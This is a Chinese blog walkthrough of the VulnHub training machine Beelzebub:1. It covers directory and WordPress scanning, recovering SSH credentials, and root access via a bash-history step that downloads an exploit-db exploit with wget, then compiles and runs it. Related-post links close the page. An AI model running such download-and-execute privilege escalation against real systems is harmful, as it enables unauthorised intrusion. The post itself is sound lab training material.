vlnhub之Beelzebub :1

最新推荐文章于 2024-02-23 14:53:04 发布
最新推荐文章于 2024-02-23 14:53:04 发布
阅读量488 收藏
点赞数 2
分类专栏: 网络安全 文章标签: php 系统安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qwweggfe/article/details/120487201
版权

0X001 简介

我们在下载靶机时会有这样的提示:您必须尽可能多地枚举并且不要忘记 Base64。说明我们要使用base64,他主要是对Beelzebub进行base64编码,然后可以访问到新的页面,下面是我的一系列操作。

0X002 渗透过程

首先我进行IP扫码,获取靶机的ip地址

我们查看这个ip的端口开启了哪些服务

 发现他是使用的apache 2.4.29进行搭建的,于是我打开这个网页

 我们看一看他有没有子目录

gobuster dir -r -u http://192.168.181.169/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,bak

 于是我在/index.php页面的源码页面给我们了一些提示

 于是对其进行mds编码

echo -n beelzebub | md5sum

 

 于是打开网页进行查看

发现他进行了页面的跳转, 那我想他会不会在这个页面下有一些子目录呢,于是进行目录扫描

gobuster dir -r -u http://192.168.181.169/d6bf00c767d95fcd6bc40fad7ead64cc --wordlist /usr/share/seclists/Discovery/Web-Content/big.txt -x php,html,txt

 

 什么也没有,于是我想到了wordpress CMS了解他到WP-CMS – WordPress 插件 | WordPress.org China 简体中文

进行查看,于是我使用wpscan进行查看

wpscan --url http://192.168.181.169/d18e1e22becbd915b45e0e655429d487/ -e --plugins-detection aggressive --ignore-main-redirect --force --api-token xxxxxxxxx

 我发现了两个用户

 还有三个子目录

 在查看的工程中,发现只有/wp-content/uploads/可以访问

 发现他还有一个目录可以查看/Talk To VALAK

 于是发现了登录的密码

 于是进行ssh登录

 登录成功于是进行提权

首先我们当然是查看历史记录了

cat .bash_history

wget https://www.exploit-db.com/download/47009

mv 47009 ./exploit.c

gcc exploit.c -o exploit

./exploit

 于是获得root权限

获得最终的flag

 

我带的我们
关注
专栏目录
安全大模型以及训练数据集
05-21 204
安全大模型和数据集
(Vulnhub靶场)BEELZEBUB: 1 write up
weixin_44588899的博客
05-24 600
文章目录环境准备信息搜集漏洞利用权限提升 环境准备 靶机地址:https://www.vulnhub.com/ kali攻击机ip:192.168.220.128 靶机 ip: 靶机地址: 使用命令: arp-scan -l 探测发现是:192.168.220.134 信息搜集 nmap -T4 -p- -A 192.168.220.134 发现开放22、80端口, 打开web页面发现是apache默认页面,直接dirb扫描一下目录 dirb http://192.168.220.134 .
【Vulnhub靶场】BEELZEBUB: 1
DG_s1mple
03-25 4119
环境准备 下载靶机导入到vmware 靶机的IP地址为:192.168.2.22 攻击机IP地址为:192.168.2.18 信息收集 我们使用nmap扫描一下靶机开放的端口信息 靶机开放了ssh跟http服务,并且apache版本号为2.4.29(这个待会儿有用,先记着 ) 我们访问一下他的网站看看 是默认网页,我们使用工具扫描一下 我们挨个访问一下,先访问一下index.php 发现apache跟刚刚不一样,为2.4.30,猜测可能是自己写的页面,我们查看一下源代码 My heart wa
【VulnHub靶场】——BEELZEBUB: 1
Demo不是emo的博客
09-25 1万+
​ 今天写一份BEELZEBUB: 1靶场教程(简单难度),靶场环境来源于VulnHub,该网站有很多虚拟机靶场,靶场入口在这,推荐大家使用,大家进去直接搜索BEELZEBUB: 1就能下载今天的靶场了,也可以找我拿,话不多说进入正题
Vulnhub靶机:Beelzebub 1
qq_48904485的博客
01-07 467
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:Beelzebub:1(10.0.2.9)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/beelzebub-1,742/
VulnHub日记(十三):Beelzebub:1
Dawn_Xi的博客
10-12 652
靶机介绍 虚拟机链接:Beelzebub: 1 ~ VulnHub 参考博客:Beelzebub Writeup - Vulnhub - Walkthrough - Security 开始练习 本机ip:192.168.60.130 目的机ip:192.168.60.131 netdiscover找到ip netdiscover -r 192.168.60.0/24 nmap扫描开放服务端口 nmap -A 192.168.60.131 访问80口,dirsearch枚举..
Beelzebub:文件之王-一种业余操作系统
02-03
别西卜 ... 另外,使用GNU Make时,您感兴趣的输出文件是/build/beelzebub.amd64.x86.iso ,使用/build/beelzebub.amd64.x86.iso时是.vmake\amd64.debug\beelzebub.amd64.debug.iso beelzebub.amd64.
“如果我被Beelzebub驱逐出魔鬼,……”:关于网络故障的恶作剧-研究论文
05-19
在经历了关于商业网络优势的第一个欣欣向荣的阶段之后,现在有许多报告证明了它们令人困惑的过度复杂性。 网络故障是多方面的:大量的环境信息,协调封锁,严重的接口问题,永久性决策冲突,不对称的权力关系,节点...
RE:从零开始的算法之路第一章
RozenScarlet的博客
10-21 484
STL和基本数据结构1.vector介绍定义常用操作例题 1.vector 介绍 数组是高级语言基本的数据结构,但C艹的静态数组不能根据需要扩大或缩小空间,虽然能定义足够大,但在空间紧张或需要少量增删是可以利用动态数组的方法更简单的实现. 由于vector本质还是数组,内存空间是连续的,所以增删回造成内存块的复制,所以并不适合大量增删 更多关于vector 定义 基本定义 vector<类型>命名~~(初始化元素数量,初始化元素)~~;划线处可有可无,但不能只有一个初始化元素 例: vecto
Vulnhub-BEELZEBUB: 1
Re1_zf的博客
02-01 295
1、目录扫描很重要,尤其是响应码,很有可能有静态页面存储信息的情况,仔细核查200响应码页面2、一串无从下手的字符串可以在目录上尝试一下3、关键页面,尤其是有信息交互的页面,如果没有明显的可利用信息,可以注意一下页面的cookie,有可能就藏着敏感信息,还需要注意,有的时候也需要交互一下再去查看4、phpmyadmin那个估计就是兔子洞了,像OSCP中就需要注意这种兔子洞,会浪费很长时间5、wordpress的神器-wpscan,利用好的话简直无敌。
每周打靶练习之BEELZEBUB: 1
最新发布
chhsbsjs的博客
02-23 406
接下来用kali的wpscan进行漏洞扫描,wpscan --url=http://192.168.13.138/d18e1e22becbd915b45e0e655429d487/ --ignore-main-redirect --force -e --plugins-detection aggressive。接下来我们对该网站目录进行一个扫描,还是用到我们的dirmap,python dirmap.py -i 192.168.13.138 -lcf,发现有一个phpinfo和phpmyadmin。
靶机渗透练习34-Beelzebub
hirak0的博客
04-18 579
靶机描述 靶机地址:https://www.vulnhub.com/entry/beelzebub-1,742/ Description Difficulty: Easy You have to enumerate as much as you can and don’t forget about the Base64. For hints add me on Twitter- ShauryaSharma05 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: IP地址:
vulnhubBeelzebub靶机
woshicainiao666的博客
02-06 947
通过上面的gobuster扫描,扫到word press框架,然后使用wpscan扫描报错,且访问页面,会重定向到192.168.1.6的网页中。随便输入一个名字,在返回的request包中,包含password:M4k3Ad3a1。查看.bash_history,看到提权的方法。
vulnhub 入门DC-1
weixin_52780973的博客
12-31 364
vulnhub靶场 入门 DC-1 攻防
Vulnhub靶机实战-PRESIDENTIAL
黑白的博客
01-10 1277
声明 好好学习,天天向上 搭建 vulnhub官网下载完镜像后,用vmware打开,遇到错误点击重试,即可,选择NAT后,直接就DHCP了 注意一点,vmware的兼容性,有问题,我用vmware,反弹shell和提权的时候,惨遭失败,一定要用oracle virtualbox,一定一定一定 vmware我用的桥接,virtualbox用的仅主机网卡#2,调了一下本机的网卡,调了半天,两边才能互相ping通 信我一句话,这非技术问题困了我好几天,弄不出来,vulnhub首页说建议用virtualbox,又说
vulhub下载及使用(小宇特详解)
小宇的web博客
04-14 9717
vulhub下载及使用(小宇特详解) 1.了解vulhub Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。 2.下载vulhub git clone https://github.com/vulhub/vulhub.git 3.打开vulhub,先cd到vulhub,再查看上级目录。 4,启动环境,随便进入一个目录,cd spring/CVE-2018-1
vulnhub靶机之dawn
timesleep的博客
12-05 964
首先确定我们的IP 我们的靶机IP为192.168.34.160 kali的IP为192.168.34.175 那我们首先扫描端口 1234这个端口是我们之前做的时候留下的 我们看到了有80这个端口我们访问一下 好我们扫一下目录 我们访问一下 我们发现了日志文件我们看一下 然后我们继续看靶机的其它端口如,139,445有没有可利用的 我们看到还有一个ITDEPT的共享目录我们去看一下发...
Vulnhub靶机渗透测试实战(一):DC-1(入门)
热门推荐
weixin_41038469的博客
03-11 2万+
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/ 主机渗透系统: macOS10.13 安装好虚拟机后挂载Virtualbox运行 第一次进行渗透实战演练,打开虚拟机后发现需要登录密码,一脸懵逼。翻查网页上的介绍才知道,就是不...
教你怎么用Vulnhub来搭建环境
大方子
09-22 2万+
0x01 前言 Vulnhub它是一个提供各种漏洞环境的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。 如果只是练习一些常见的漏洞可以看我另外两篇用Docker来搭建各种漏洞靶场(妈妈再也不用担心我没有靶场练习了)从CentOS安装Docker来搭建漏洞靶场到Joomla 3.4.5 反序列化漏洞复现(附批量Getshell脚本) 0x02 下载 https:/...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值